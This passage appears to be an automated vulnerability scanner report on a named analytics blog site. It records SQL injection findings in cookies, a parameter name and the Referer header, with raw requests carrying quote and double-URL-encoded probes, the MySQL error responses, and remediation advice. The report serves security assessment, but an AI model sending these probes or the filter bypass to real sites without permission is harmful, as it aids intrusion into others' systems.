GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:39:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:39:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:14:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:58 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:14:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:12:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:12:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:13:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:13:35 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:13:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28124
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <h2>Finding the proverbial Needle in the Haystack</h2> ...[SNIP]...
Request 2
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:13:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:16:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:16:31 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:16:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28124
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:20:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:20:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:20:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28124
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <h2>Finding the proverbial Needle in the Haystack</h2> ...[SNIP]...
Request 2
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:20:11 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
1.107. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?1%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:23:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/77-refresh-rate-content-metric.html?1%2527%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:23:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/86-google-analytics-intelligence.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:37:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/86-google-analytics-intelligence.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q='' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:37:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:18:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
